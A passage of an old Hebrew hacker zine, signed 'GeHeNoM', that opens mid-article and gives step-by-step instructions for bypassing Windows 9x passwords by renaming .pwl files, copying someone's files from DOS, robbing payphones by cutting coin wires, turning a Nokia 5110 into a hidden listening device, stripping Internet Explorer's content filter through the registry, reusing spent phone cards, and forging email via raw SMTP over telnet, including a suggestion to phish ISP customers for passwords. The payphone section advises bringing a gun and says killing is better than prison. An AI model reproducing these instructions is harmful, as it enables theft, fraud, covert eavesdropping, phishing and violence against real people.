פעולה מתמטית ואז תתכנתו משהו שעושה את אותה הפעולה אבל הפוך.

הבעיה שלא תוכלו לדעת מה היא אותה פעולה מתמטית...

בכל מקרה, אנחנו לוקחים את אותו הקובץ (pwl.), ומשנים אותו ל xxx.

כמו כן תוכלו לשנות אותו לכל דבר אחר, לדוגמא:

 

rename c:\windows\*.pwl c:\windows\*.fuk

 

העיקר הוא שלקובץ לא יהיה שיוך. כלומר שהווינדוס לא יזהה את סוג הקובץ. לדוגמא אל תהפכו את זה ל:

 jpg. - גרפיקה

 gif. - גרפיקה

 bmp. - גרפיקה

 txt. - מסמך טקסט

 doc. - מסמך של וורד

 ppt. - מסמך של פאור פוינט

 mp3. - קובץ סאונד

 wav. - קובץ סאונד

mid. -  קובץ סאונד

 

אני חושב שקלטתם את הרעיון...

עכשיו, תתחילו את המחשב מהתחלה.

אתם אומנם תקבלו את התיבה שמבקשת סיסמא, אך תוכלו להקליד איזה סיסמא שבא לכם...

זה 100% יעבוד. זאת מכיוון שהווינדוס לא מוצא את הקובץ שאליו הוא אמור להשוות. ולכן כל מה שתקלידו

יהיה נכון. הווינדוס יקבל את זה כסיסמא חדשה, זאת מכיוון ששוב, הווינדוס לא מוצא שום קובץ סיסמא

במחשב, ולכן תתבקשו לאשר את הסיסמא החדשה. עכשיו, כשאתם גומרים לעשות מה שרציתם לעשות עם המחשב,

החזירו את הסיסמא הישנה כדי שאף אחד לא ידע מה שעשיתם.... איך מחזירים את הסיסמא הישנה?

פתחו חלון דוס, והקלידו את השורה הבאה ולאחר מכן לחצו על מקש ה Enter:

 

rename c:\windows\*.xxx c:\windows\pwl

 

או אם שיניתם ל fuk. אז הקלידו את זה כך:

 

rename c:\windows\*.fuk c:\windows\pwl

 

 

שיטה מספר 3

 

שיטה מספר 3 מבוססת על שיטה מספר 2.

 

* התחילו את המחשב מהתחלה

 

* לחצו ברציפות על כפתור ה F8 הרבה פעמים בלי להפסיק.

 

אתם תקבלו תפריט שייתן לכם לבחור איך להתחיל את המחשב. בחרו ב Command prompt only

עכשיו, הרעיון בשיטה 3 זה לא להיכנס לווינדוס, אלא פשוט להשיג גישה לקבצים על המחשב.

למי שמכיר את דוס, שייהנה. למה שלא, אני אתן פה קצת עזרה...

תבדקו שאתם בספרייה הראשית, כדי לעשות זאת הקלידו:

\:c

עכשיו שאתם בספרייה הראשית הקלידו

dir

כדי להיכנס לספרייה ששם נמצאים הקבצים שאתם רוצים הקלידו

cd directory

לדוגמא אם לספרייה קוראים Xfiles אז תקלידו

cd Xfiles

ואם לספרייה קוראים games אז תקלידו

cd games

עכשיו שוב הקלידו

dir

הכניסו דיסקט לכונן דיסקטים ותעתיקו את הקבצים שאתם רוצים. אם אתם רוצים את כולם, הקלידו

:copy *.* A

אם אתם רוצים קובץ מסוים, לדוגמא game.exe הקלידו

:copy game.exe A

 

זהו, סיימנו לכתבה הזאת, ורק לסיכום,

אם עד עכשיו חשבתם שהקבצים שלכם במחשב מוגנים, כדאי שתחשבו עוד פעם. עד לכתבה הבאה.

                                                                           GeHeNoM

איך לגנוב כסף ממכשירי טלפון

 

מכירים את המכשירים האלה ששמים שקל ואז אפשר להתקשר?

אפשר למצוא אותם בעיקר באיזה מקום תקוע בעיר, במוסדות חינוך, ומתנ"סים.

שדידת מכשיר טלפון כזה צורכת רק כמה דברים פשוטים. לכן גם השרוטים שביניכם יוכלו לעשות זאת.

דבר ראשון, אל תתנהגו כמו מטומטמים. אתם בני זונות. תזכרו את זה.

או במילים אחרות, אל תבואו באמצע היום מול מלא אנשים לעשות את עבודתכם.

כמו כן אל תכריזו לפני כל החברים שלכם שגנבתם 500 שקל מאיזה טלפון ציבורי בצומת...

 

טוב, כעת מייצאו טלפון כזה שיש לכם גישה לחוטי החשמל שלו.

פשוט חפשו את הכבל שמתפתל צמוד לקיר או את המצמת (תיבת חיבור).

עכשיו, בקו טלפון רגיל, יהיה שני חוטי חשמל. אדום וירוק.

בטלפון מסוג כזה, יהיו ארבעה. אדום וירוק לתפעול התקשורת (העברת פולסים ושטויות),

וצהוב ושחור בשביל בדיקת המטבעות. חפשו מקום בכבל שבו חתך לא ייראה בולט לעין.

שליפו את הסכין שלכם וחיתכו בעדינות חלק מן הכבל כך שייחשפו ארבעת חוטי החשמל הצבעוניים.

חיתכו לגמרי את השחור והצהוב והניחו לאנשים לנסות להשתמש בטלפון...!

 

מה קורה פה?

^^^^^^^^^^^

ובכן, כשאתם שמים לדוגמא מטבע של 5 שקל בתא הרסיבר (Receiver) של המכשיר בכדי לעשות שיחה,

המטבע נופל לתוך תיבת המטבעות הזמנית ונשאר שם עד שאחד משלושת הדברים הבאים קורים:

 

* התקשרתם, דיברתם, ניתקתם, והמטבע נשלך מתוך תיבת המטבעות הזמנית אל תיבת המטבעות הרגילה

ופוגש שם את כל השקלים שהיו שם לפני כן ונשאר שם עד שטכנאי מוסמך של בזק בא עם מפתח

מיוחד, פותח את התיבה, ומוציא את כל הכסף...

 

* התקשרתם, דיברתם, ניתקם, אבל שילמתם יותר ממה שהיה צריך. הכל מחושב, העודף נופל לתיבת העודף,

והשארית לתיבת המטבעות הרגילה ופוגש שם את כל השקלים שהיו שם לפני כן ונשאר שם עד שטכנאי

מוסמך של בזק בא עם מפתח מיוחד, פותח את התיבה, ומוציא את כל הכסף...

 

* התקשרתם, אף אחד לא ענה, או שהיה תפוס, או משהו דומה, ואז ניתקתם.

ברגע שניתקתם המטבע נופל מתיבת המטבעות הזמנית ישר לתוך תא העודף.

 

זה פחות או יותר הסוד שעומד מאחורי רעיון השדידה שלנו פה.

אתם פשוט מאוד חוזרים בשעה 3:00 לפנות בוקר, מחברים בחזרה את חוט החשמל השחור

וגם כמובן את חוט החשמל הצהוב, מדביקים עם סלוטייפ או משהו, מרימים את השפופרת

ומקשיבים לצליל שאומר שיש קו (בפממממממממממממממ...), ומנתקים.

 

 החלק הכייפי

#############

 

הכסף יתחיל להתגלגל החוצה בדיוק כמו בסרטים!!!!!

מומלץ להכין שקית מראש, למה לא בטוח שיהיה מקום בכיסים.

השיא שלי זה 614 שקל בלילה יחיד!!! (כמובן שעשיתי את זה ביותר מטלפון אחד באותו לילה).

 

כמה טיפים:

 

* מומלץ ללבוש בגדים שחורים.

 

* מומלץ לבוא עם אופנוע.

 

* מומלץ להיזהר מגמדים הומואים שמנים בכחול שיוצאים מניידת כחולה ומגעילה.

 

* אם מישהו רואה אתכם, פשוט תגידו לו שהכל נפל ככה סתם. גם לא יזיק לתת לו קצת אחוזים...

 

 

רק הערה אחרונה: כשאנשים ישימו שקל או שתיים אחרי שחתכתם את החוטים, הכסף יישאר במכונה,

והם גם לא יוכלו להתקשר, כי החוטים שאחראים על בדיקת המטבעות לא יהיה פעילים...

אם זה יעצבן אותם מאוד, הם עלולים לקרוא לטכנאי של בזק. לכן תבואו עם אקדח למקרה חירום.

עדיף להרוג מאשר לשבת מאחורי סורגים. באמת.

 

                           אז עד הפעם הבאה,

 

                                       GeHeNoM

 

הכנת מכשיר ציטוט מהפלאפון

 

אוהבים את ג'יימס בונד? אני לא.

בכל מקרה, מסקר שערכנו יוצא כי הפלאפון הפופולרי

ביותר באזור ירושלים הוא ה Nokia 5110 של רשת אורנג'.

ובכן, עם הפלאפון הזה אתם יכולים להכין מכשיר, אשר בעזרתו תוכלו לצטט לאנשים.

זה לא כמו הציטוט לשיחות עם המוטורלה של רשת פלאפון, אלא ממש מכשיר האזנה אמיתי כמו של המשטרה.

מחביאים אותו באיזה מקום בחדר ואז אפשר לשמוע את כל שמדברים שם. לדוגמא, תשאירו אותו

בכיתה ביום של אסיפת הורים ותשמעו בדיוק מה המורה שלכם אומר לכל הורה והורה. זה אמנם לא חוקי,

ועובר על חופש הפרט, אבל צוות האתר סומך על כך שתשתמשו בזה נכון ורק למקרים הנכונים.

אף אחד לא שם זין על החוק, אבל אם אין לכם כבוד לבני אדם אחרים אז איבדתם משהו...

 

בכל מקרה, להכנת מכשיר כזה מהפלאפון שלכם אתם צריכים את הכלים הבאים:

 

* פלאפון מדגם 5110 של נוקיה

 

* את הכתבה הזאת (מומלץ להדפיס)

 

* את המוח שלכם (מומלץ לבדוק שהוא עובד ע"י דפיקת הראש בקיר)

 

טוב, כעת דבר ראשון שתעשו הוא להגדיר את הפלאפון ל"מענה אוטומטי" ולשים אותו במצב שקט.

ועכשיו גבירותיי ורבותיי,

החלק המתוחכם שעושה את כל הקסם. בתחתית הפלאפון, ישנם פינים, שכאשר מחברים ביניהם,

עלול להיווצר קצר. קחו חוט חשמל, ובזהירות חברו בין הפין האמצעי בצד שמאל לפין הימני.

ברגע שזה ייקרה הפלאפון שלכם ייתקע ומייד ייכנס למצב 'אוזנייה'.

כעת כל שעליכם לעשות הוא להחביא את הפלאפון איפושהו בחדר של הקורבן.

עכשיו לכו הביתה והתקשרו מהטלפון שלכם או מאיזה פלאפון שגנבתם למספר של הפלאפון שאותו

הפכתם למכשיר האזנה. הפלאפון מיד יקבל את השיחה, מה שלא עולה כסף כי זאת שיחה נכנסת, ואתם

תשמעו את כל מה שמי שנמצא באזור הפלאפון שלכם אומר ועושה. רק תזכרו שמכשיר האזנה עולה הרבה יותר

מפלאפון, ולכן אם אתם משתמשים במידע זה בכדי להכין מכשיר כזה מהפלאפון שלכם, לא יזיק אם תשלחו

לי 200, 300 שקל בדואר.

     שלכם,

 

      GeHeNoM

 

פריצת סיסמת הצנזורה של Internet Explorer

 

הדפדפן של מיקרוסופט, עם כל הדברים הטובים שבו, והפופלריות שלו, הוא לא הדפדפן הכי מוגן.

בכתבה הזאת אני אראה לכם משהו שלא ממש רציתם לדעת על הדפדפן אינטרנט שאתם כל כך אוהבים.

כפי שידוע, בדפדפן של מיקרוסופט קיימת האפשרות לצנזר אתרים מסוימים ולחסום אליהם את הגישה.

הדבר נועד למורים/הורים שלא רוצים שאנחנו הילדים נוכל להיכנס לאתרי פורנוגרפיה, אנרכיה, וכו'

אבל לפני שאני אראה לכם איך להוריד את הגנת הסיסמא, קודם, לאלה מכם שלא מצנזרים להם,

אני רק אראה למה אני מתכוון. פיתחו את הדפדפן (Internet Explorer).

 

לחצו על תפריט Tools

בחרו ב ...Internet Options

 

חלון חדש ייפתח, עם כל מיני תפריטים כגון: General, Security, Content, Connections, ועוד...

לחצו על Content

התבוננו ב Content Advisor לרגע.

זה נועד לחסום גישה לאתרים, ואפשר להוריד את החסימה רק על ידי סיסמא.

כדי להראות לכם למה אני מתכוון לחצו על כפתור ה Enable

ותפעילו את החסימה. שימו סיסמא שתוכלו לזכור. סגרו את הדפדפן.

פיתחו אותו מחדש. עכשיו נסו להיכנס לאתר שחסמתם. מה קורה? יפה.

עכשיו נסו להוריד את החסימה. זה יבקש ממכם סיסמא. אתם כמובן יודעים אותה, כי אתם בחרתם אותה,

אבל נניח אתם לא יודעים אותה. הקלידו סיסמא שגויה. מה קורה? אחלה. עכשיו את הסיסמא.

כמו שאתם רואים אתם עכשיו יכולים לבטל את החסימה. אבל אל תבטלו. עכשיו הגיע הזמן שתראו איך

פורצים את זה בלי לדעת את הסיסמא. מוכנים? אני ממליץ להדפיס את הקטע הבא,

כי זה לא משהו שקל לזכור בעל פה. אז איך בדיוק עושים את זה? עם הרג'יסטרי.

 

 

Windows Registry

 

מה זה הרג'יסטרי?

הרג'יסטרי זה פשוט דאטאבייס (database) ענק שבווינדוס 95/98/NT הוא בעצם

מחליף את כל קבצי ה pif. וה ini. ועוד כל מיני קבצי אינפורציה שהיו לנו בווינדוס 3.11 ו 3.1

אז במילים אחרות, כל האפשרויות (Settings) של החומרה, וכל מיני תוכנות נמצאות שם. עכשיו הכירו את

עורך הרג'יסטרי - Regedit. אתם תשמשו בעורך הזה הרבה. אם כדי לתקן בעיות במחשב, לעשות שיפורים,

או לדוגמא, לפרוץ את סיסמת ההגנה של אינטרנט אקספלורר.

אני עכשיו לא אראה לכם צעד אחר צעד איך משתמשים בעורך, כי זה לוקח זמן.

מה שכן, אני אראה לכם צעד אחר צעד איך לפרוץ את הסיסמא.

 

 

פריצת הסיסמא

 

כשהדפדן פתוח, עשו את הצעדים הבאים:

* לחצו על התחל

* הפעלה...

* הקלידו: regedit ולחיצו על Enter

 העורך ייפתח. לחיצו לחיצה כפולה על:

 

HKEY_LOCAL_MACHINE -> SOFTWARE -> Microsoft -> Winndows -> Current Version -> Policies

 

התבוננו בציידו הימיני של העורך. אם יש הגנת סיסמא, אתם תראו משהו שכתוב עליו Key.

סמנו את זה עם העכבר ולחיצו על מקש ה Delete. לאחר שמחקתם את זה, הסיסמא כבר לא תהיה קיימת.

זה מכיוון שהסיסמא הייתה בפנים. היא פשוט הייתה מוצפנת כמובן.... זאת כדי שלא תוכלו לדעת מה היא,

אם כי קיימות תוכנות שהופכות את זה לטקסט נקי ומראות לכם מה הסיסמא. אבל תוכנות כאלה בד"כ לא ניתנות

להפצה בחינם, והם בהחלט לא שוות את הכסף שמבקשים עבורם. אם אתם בכל זאת מעונינים, נסו את האתר הבא:

http://www.ntbugtraq.com

 

רק הערה אחרונה - אחרי שאתם מוחקים את הסיסמא, תסגרו את הדפדפן, ותיכנסו אליו שוב.

תעשו את זה כדי שהדפדפן יידע שאין יותר סיסמא. הוא בודק ברג'יסטרי רק כשהוא נפתח מחדש.

לכן אם הוא פתוח כשאתם מוחקים את הסיסמא, הוא לא יידע שמחקתם, ויבקש סיסמא...

אז פשוט סגרו את הדפדפן, ואז תפתחו אותו שוב, ולא יהיה בעיות.

זהו.

עכשיו לכו לבי"ס,

תעיפו את ההגנה של הדפדפן, ותגלשו חופשי.

                                  שלכם,

                                   GeHeNoM

      


 

שימוש חוזר בכרטיסי טלכרט

 

כ-ע-ת תלמדו איך להשתמש בכרטיסי טלכרט שנגמרו'.

דבר ראשון, עליכם למצוא כמה טלכרטים מ ש ו מ ש י ם. כן, משומשים.

בשביל זה לכו לאוסף טלכרטים של אח שלכם הקטן ותגנבו לו חאפלה של איזה 20.

עדיף טלכרטים ישנים, למה הרבה מהחדשים מוגנים מפני הטריק שאני אראה לכם פה.

כמו כן עדיף שיהיה לכם איזה 20 כי בניסיונות הראשונים זה בד"כ לא יוצא משהו ומה שקורה

זה שהטלכרט נהרס... לכן תדאגו שיהיה לכם כמות מכובדת. אוקי, עכשיו פתחו קלטת וידיאו ריקה.

חשוב מאוד שהקלטת תהיה ריקה, בלי שום דבר מוקלט עליה. ושיהיה חדש. מחיקת הקלטה ישנה לא תעזור לנו.

כעת קחו מספריים וגזרו בעדינות חלק מן הסליל שבפנים. זהרו על הסליל השחור שלא יתלכלך. הדביקו

את הסליל על החלק האחורי העליון של הטלכרט, איפה שיש הרבה בליטות קטנות. לאחר מכן, עברו עם עיפרון

על הסליל, כך שיישאר שכבה דקה של פחם. באסה שאת העפרונות עם הפחם הישנים החליפו כיום עם חומר אחר.

לכן תיאלצו ללכת לחנות גרפיקה או לבית הישן של סבתא שלכם כדי למצוא עיפרון פחם. אחרי שגמרתם להדביק

את הסליל השחור המגנטי מהקלטת על הטלכרט, והשארתם עליו שיכבה דקה של פחם מן העיפרון, הכניסו אותו

לתוך טלפון ציבורי. מה שייקרה פה זה פעולה מגנטית הפוכה אשר הגלאי המגנטי לא יוכל לעמוד בו,

ולכן יהיה לכם זמן חופשי ללא הגבלה על הטלפון. אז דברו חופשי, כי זה בזק.

 

                                                             

    GeHeNoM

 

 

שימוש חוזר בכרטיסי טלכרט - שיטה מס. 2

 

שיטה שנייה למחזור טלכרטים...

דבר ראשון, עליכם למצוא כמה טלכרטים מ ש ו מ ש י ם. כן, משומשים.

בשביל זה לכו לאוסף טלכרטים של אח שלכם הקטן ותגנבו לו חאפלה של איזה 20.

עדיף טלכרטים ישנים, למה הרבה מהחדשים מוגנים מפני הטריק שאני אראה לכם פה.

כמו כן עדיף שיהיה לכם איזה 20 כי בניסיונות הראשונים זה בד"כ לא יוצא משהו ומה שקורה

זה שהטלכרט נהרס... לכן תדאגו שיהיה לכם כמות מכובדת. אוקי, עכשיו תכייסו מהמכולת טיפקס.

התבוננו בחלק האחורי של אחד הטלכרטים. רואים נקודות קטנות בולטות למעלה?

כסו אותם בשכבה שווה דקה של טיפקס. עשו זאת בעדינות. כל פעם שהטלכרט ייגמר,

תיאלצו לעשות זאת מחדש, אבל לא נורא. תיהנו!!!!!!!!!!!

                                     ודברו חופשי, כי זה בזק.

 

 

                                                        Gehenom

 

זיוף Email - חלק 1

 

בכתבה הזאת, הכתבה הכי טובה עד עכשיו אם תשאלו אותי,

אני אראה לכם איך לזייף אי מייל. מה זאת אומרת? הכוונה היא שתוכלו לדוגמא

לשלוח לחבר שלכם אי מייל והחבר שלכם יחשוב שהוא קיבל את האי מייל הזה מדורון שפר.

כמובן שמצחוקים אפשר לעבור לצחוקים יותר טובים, כמו לשלוח למורה אי מייל מהמנהל,

או שאפשר גם לעבור לדברים רציניים יותר, כמו למשל לשלוח ללקוח של ספק אינטרנט כגון

נטויז'ין לדוגמא, אי מייל מהצוות תמיכה של נטויז'ין ולבקש ממנו את השם משתמש והסיסמא.

כמובן שזה ייראה לו חשוד, ולכן מה שאנחנו, ההאקרים, עושים במקרים כאלה,

זה משתמשים בקצת פסיכולוגיה. אבל לפני שאני אתן לכך דוגמאות כדאי שנעבור כבר

            לזיוף האי מייל הראשון שלכם!!!

                                   

 

החלטתי שלפני שאני אסביר משהו, הפעם נתחיל מייד עם האקשן (...Yeah, right)

רק אח"כ אני אסביר מה עשינו, ונתחיל לשחק עם זה... (???Play with it)

רק דבר אחד לפני שאנחנו מתחילים, את האקשן הראשוני נעשה עם Hotmail.

למה עם Hotmail? מכמה סיבות:

 

* מליוני אנשים רשומים אליהם.

אתם תוכלו לזייף אי מייל עם ביטחון וניסיון להמוני אנשים.

 

* מסיבות כאלה ואחרות אני רוצה שגם אתם תשנאו את מיקרסופוט ותצטרפו למועדון השונאים והשונאות.

אם אני אראה לכם כמה קל זה לשלוח אי מיילים מזויפים ללקוחות שלהם, סביר להניח שלא תאהבו אותם על כך.

בעיקר בגלל שסביר להניח שכרגע אתם לקוחות שלהם.

 

* ככה סוף סוף תעזבו אותם. תזרקו אותם. ותשיגו כתובת אי מייל נורמלית.

לא עוד [email protected] מגעיל.... אלא מעכשיו [email protected] יפהפה.

 

בכדי שנוכל להתחיל, אם אתם עוד לא רשומים

ל Hotmail.com אז לכו ל Http://www.hotmail.com ותירשמו.

 

................................................

הערה:

Hotmail.co.il ו Hotmail.com זה לא אותו דבר.

גם המנויים של Hotmail.co.il צריכים ללכת לאתר

של Hotmail.com ולהירשם. אם לא תעשו את זה,

     אז כלום פה לא יעבוד...

רק מי שרשום ל Hotmail.com לא חייב להירשם שנית

אלא ישתמש בכתובת שקיבל מ Hotmail.com

                                       תודה

................................................

 

טוב, נתחיל. נגיד לדוגמא שהאי מייל שלכם ב Hotmail.com הוא [email protected]

אנחנו עכשיו נשלח לכם אי מייל מראש הממשלה. כתובת האי מייל של ראש הממשלה היא: [email protected]

(דרך אגב, זאת באמת כתובת האי מייל של הראש הממשלה. נשבע לכם. אל תאמינו.. לא צריך.)

 

אוקי, תעשו את הצעדים הבאים:

 

* לחצו על תפריט ההתחל

* בחרו בהפעלה...

* עכשיו הקלידו: telnet mail.hotmail.com 25

  ולחיצו על כפתור ה Enter.

 

חלון חדש ייפתח. זה חלון טלנט. מה שאנחנו בעצם עושים פה זה מטלנטים (מתחברים..) לשרת דואר של

Hotmail לפורט 25. מבולבלים?

תסגרו את חלון הטלנט ואני אסביר לכם....

 

האינטרנט הוא בעצם רשת ענקית של רשתות מחשבים מחוברות אחת לשנייה.

ביחד זה בלגן אחד גדול של תעבורת אינפורמציה בין מיליוני מחשבים. מחשבים ביתיים, שרתים,

תחנות עבודה, Main Frames, מפלצות, חתולים, מה שאתם לא רוצים.

עכשיו, לא לכל המחשבים האלה יש Windows. בעצם, לרובם אין. לרוב השרתים לפחות...

בכל מקרה, מכיוון שלא לכל המחשבים יש מערכת הפעלה אחת סטנדרטית, צריך כלי תקשור סטנדרטי.

צריך חוקים מסוימים, שכל מחשב ילך לפיהם כדי לתקשר עם מחשבים אחרים. צריך שפה משותפת בין המחשבים.

צריך.... פרוטוקולים.... יפה. עכשיו לא נתחיל לדבר פה על כל הפרוטוקולי אינטרנט כי יש הרבה,

אבל תבינו שהדפדפן אינטרנט המחורבן שלכם זה לא אינטרנט. זה דפדפן. הוא מתחבר לשרת HTTP.

ולפי חוקי פרוטוקול ה HTTP הוא מתקשר עם השרת, מקבל את המידע על האתר, (בשפת HTML) ומתרגם את זה

למה שאתם רואים בדפדפן.

דרך אגב,

 

HTTP = Hyper Text Transfer Protocol

 

כלומר פרוטוקול של העברת היפר טקסט. או במילים אחרות טקסט שאתם לוחצים עליו וכך עוברים לטקסט אחר.

מה שנקרא בשפה המודרנית - לגלוש. ובשפה הדו מודריונרית - סתאאאאאם. לא חשוב.

עכשיו, אי מייל לעומת זאת משתמש בשני פרוטוקולים: SMTP ו POP3.

אנחנו עכשיו נשתמש רק ב SMTP. למי שמעוניין,

 

SMTP = Simple Mail Transfer Protocol

 

ובקציצוצוציצור עכשיו, מה שנעשה זה, בדיוק כמו שהדפדפן אינטרנט שלכם מתחבר לשרת HTTP לפורט 80,

אנחנו נתחבר לשרת SMTP לפורט 25. למה? ככה. אני לא אסביר את זה בכתבה הזאת כי אין מקום...

ואז, כמו שלדוגמא ניקח את ה MS Outlook שלכם, כמו שהאאוטלוק (או כל תוכנת דואר אחרת) מתקשרת עם

שרת הדואר (SMTP), ככה הפעם אנחנו נעשה  י ד נ י ת. נעשה חיבור חי. ונדבר עם השרת. דמיינו שעכשיו

אתם תוכנת אאוטלוק. או כל תוכנת דואר אחרת שאתם רוצים. עכשיו דמיינו שאתם אפרוח.

עכשיו דמיינו שאתם במדינה שבה סמים הם דבר חוקי. דמיינו שאתם..

          ### עכשיו תתעוררו ותחזור למציאות המרושעת. ###

נמשיך.

לוחצים על התחל, הפעלה, ומקלידים telnet.

זה ייפתח את תוכנת הטלנט, שנותנת לנו להתחבר לאיזה שרת שאנחנו רוצים לאיזה פורט שאנחנו רוצים.

מה זה פורט (יציאה)? ובכן, הכוונה הטכנית היא למשהו שפתוח במחשב ומוכן לחיבור. כלומר מחכה לחיבור

ממחשב אחר (או מכל דבר אחר בעצם). אבל בדרך כלל כשמדברים על פורט מתכוונים למספר של הפורט.

לדוגמא פורט 80.

פורט 80 למי שלא יודע זה השרת אינטרנט, HTTP.

כמובן שזה לא תמיד חייב להיות דווקא ככה, בעיקרון כשפותחים שרת אפשר לקבוע דרך איזה

פורט יהיה אפשר לגשת אליו. אבל בד"כ פורט 80 זה אתר אינטרנט. פורט 110 זה דואר נכנס.

פורט 25 זה דואר יוצא, ולכן אנחנו נתחבר לפורט 25. אבל שוב, זה לאו דווקא תמיד ככה.

למי שרוצה לדעת למה דווקא פורט 80 זה לשרת אינטרנט ולמה דווקא פורט 25 לדואר יוצא,

אז ככה: לכל פרוטוקול אינטרנט יש RFC, שמגדיר אותו. זה לא אומר שכל RFC מגדיר פרוטוקול אינטרנט.

יש גם RFC על אבטחה, או על תוכנה חדישה בפיתוח, או סתאם הערות על פיתוח טכנולוגיית אינטרנט

כזו או אחרת. יש RFC מצחיק, יש RFC דפוק, יש כל מיני.

 

RFC = Request For Comments

 

עכשיו, שם קובעים את הסטנדרטים לכל פרוטוקול. ככה כל חברה או תכנתן יחיד יכול לתכנת את תוכנת השרת

או את תוכנת הלקוח שלו לפי אותם החוקים שכל חברה/תכנתן אחר בעולם ייעשה ולא משנה לאיזה מערכת הפעלה

זה מתוכנת זה יוכל לתקשר עם השרת/לקוח של האחר.

(שרת/לקוח: תוכנת לקוח = אינטרנט אקספלורר לדוגמא | תוכנת שרת = HTTPD לדוגמא [ למי שמכיר ] ) 

לכן אאוטלוק יכול להתחבר לשרתי דואר על מקינטוש, יוניקס, ווינדוס, נובל וכל מערכת אחרת בעצם.

לכן שרת הדואר של מיקרוסופט יכול לקבל אימייל מכל תוכנת דואר שבעולם.

עכשיו נחזור לזיוף האימייל שלנו. הרי הבטחתי לכם מייד אקשן.

טוב, תחזרו לחלון הטלנט, ומי שאצלו זה עדיין לא פתוח שייפתח. שוב, כדי להיכנס לתוכנת הטלנט

תלחצו על התחל, הפעלה, והקלידו Telnet.

עכשיו, לחצו על תפריט Terminal

בחרו ב ...Preferences

ובדקו ש'Local Echo' מסומן. אם הוא לא מסומן, סמנו אותו עכשיו, ואז לחצו על OK.

מה שה Local Echo עושה זה שהטקסט שתקלידו לשרת יוצג על המסך שלכם. זה חשוב מאוד.

עכשיו לחצו על תפריט Connect ובחרו ב ...Remote System

כאן ייפתח לכם תיבה שמבקשת פרטים על השרת שברצונכם להתחבר אליו.

 

Host Name: הקלידו כאן את כתובת השרת. במקרה שלנו mail.hotmail.com

Port: כאן מקלידים את הפורט. אפשר גם לבחור מהרשימה, אבל היא מצומצמת. הקלידו 25

TermType: באיזה הדמיה לבחור. אתם כרגע לא צריכים לדעת מה זה אומר, פשוט בחרו vt100

 

כעת, לחצו על Connect.

כמו שאתם רואים זה מתחבר לשרת דואר.

השרת מציג לנו איזה גרסה הוא, לפעמים את החברה שתכנתה אותו, את השעה, תאריך, או לפעמים כלום.

זה הכל תלוי בשרת. במקרה שלנו זה מציג:

220-HotMail (NO UCE) ESMTP server ready at Mon Feb 12 10:59:39 2000

220 ESMTP spoken here

פחות או יותר...

עכשיו, אם השרת לא מקבל ממכם קלט לזמן מסוים (בד"כ כ 10-30 שניות), הוא מנתק את החיבור.

לכן כנראה תיאלצו להתחבר מחדש לפי ההוראות שנתתי מקודם. טוב, אחרי שזה הציג לכם את הזבל שלו,

הקלידו את השורות הבאות:

 

Helo hacker

Mail from: [email protected]

Rcpt to: [email protected]

data

From: IL Goverment

Subject: Israel's Goverment is Proud of you

Date: Feb 12 2001

 

Hi Hacker

The Israeli Goverment is very proud of you

You now have the knowledge to forge email, which is real cool

And usefull too. Please use it correctly and carefully

 

IL Govermnet

.

 

זהו. רק במקום [email protected] תכתבו את האימייל שלכם.

עוד הערה זה שלחיצה על ה Backspace כדי למחוק תווים לא תעבוד. כלומר, זה ייראה כאילו זה מוחק אותם,

אבל מה שזה בעצם עושה זה מוסיף את זה כמו אות. אני לא אסביר עכשיו למה אני מתכוון, רק תיזהרו

לא לטעות בהקלדה, כי לא תוכלו להיעזר ב Backspace. אם אתם טועים, פשוט לחצו על מקש ה Enter ואז

הקלידו שוב את מה שרציתם להקליד אבל טעיתם. עכשיו כנסו ל www.hotmail.com ותבדקו את האימייל שלכם.

יהיה שם מכתב מראש הממשלה. מגניב או לא מגניב???? (!!!!!!!!!!!!!!!!!Magniv)

קראו את המכתב, ואז לחצו על Reply כדי לשלוח לו מכתב בחזרה. כמו שתראו,

זה יישלח את המכתב חזרה לאימייל האמיתי שלו. כלומר למי שאתם שולחים אימייל מזויף, אין סיכוי לדעת

שזה מזויף. אלא אם כן הוא קרא את הכתבה הזאת. בהמשך, בחלק 3 של המדריך הזה,

אני אסביר לכם איך לבדוק אם האימייל שקיבלתם מזויף.

אבל לפני שאתם קופצים לחלק 3, יש לכם את חלק 2,

שמסביר טכנית איך הכל עובד ונותן לכם לשחק עם זה כמה שאתם רוצים. עד לפעם הבאה,

 

                                                                       GeHeNoM

 

 

זיוף Email - חלק 2

 

  "יונתן הקטן הלך בבוקר אל הגן.

   הוא טיפס על העץ אפרוחים חיפש.

   אוי ואבוי לו לשובב. חור גדול

     במכנסיו. מן העץ התגלגל,

                  ועונשו קיבל..."

 

 

 

ברוווווווווווווכים הבאים לחלק השני של המדריך 'זיוף אי מייל'!!!

בחלק זה, אני אסביר לכם למה ככה זה ככה ואיך עושים את זה ואת זה.

אחרי שתגמרו עם החלק הזה, לא רק שתהיו מוכנים לעבור לחלק השלישי והאחרון,

אלא גם תוכלו לזייף אימייל לכל שרת דואר שקיים, תוכלו לעשות זאת בעברית, ולהשתמש בזה נכון,

ולהבין איך הכל עובד ולמה. תוכלו לשלוח לכמה אנשים באותו הזמן. והכי חשוב - מוטי יחזור כבר הביתה.

מי זה מוטי? וואלה לא יודע....  טוב, נתחיל.

 

}}}

 

רוב החומר שתקראו פה נלקח מ 'RFC 821' שמגדיר את פרוטוקול ה SMTP.

החומר תורגם לעברית בכדי שתוכלו להבין אותו. למרות זאת, אני לא מבטיח

לכם שום דבר, והתרגום פה נעשה בדרך האישית שלי, והוא בהחלט לא תירגם

רשמי של ה RFC. אני מאוד ממליץ לכל אלה מכם שיודעים אנגלית לקרוא את RFC 821.

 

{{{{

 

 

טוב, אז אם כי זה לא נמצא בכל שרת, רוב שרתי הדואר מבקשים שאתם,

אלה ששולחים את האימייל, תזדהו. זאת כדי שיידעו מי אתם. בד"כ כשאתם שולחים/מקבלים אימייל

הוא עובר דרך יותר משרת אחד. כאשר לכל שרת שהוא נשלח השרת שממנו הוא הגיע מזדהה, וכך מי שמקבל את

האימייל יודע דרך איפה זה עבר. זה יכול להיות מאוד יעיל במקרים מסוימים. כמובן שזאת לא הסיבה

העיקרית, זאת סתאם הייתה דוגמא שאתם כנראה תשתמשו בה בעתיד. בכל מקרה, פקודת ההזדהות היא:

 

HELO

 

עכשיו, לא כל השרתים מתייחסים לפקודה באותה צורה. יש הרבה שרתים שבכלל לא משתמשים בפקודה הזאת,

ואם תשלחו להם את הפקודה הם לא יידהו אותה. בשרתים אחרים לעומת זאת, הפקודה היא חובה, ובלעדיה,

לא תוכלו לשלוח את האימייל. אצל רוב השרתים, אתם לא חייבים להגיד HELO, למרות שכנראה השרת יעיר

לכם על כך אבל הוא בכל זאת ייתן לכם לשלוח דרכו את האימייל. ככה שתעשו מה שאתם רוצים. אני רק אבהיר

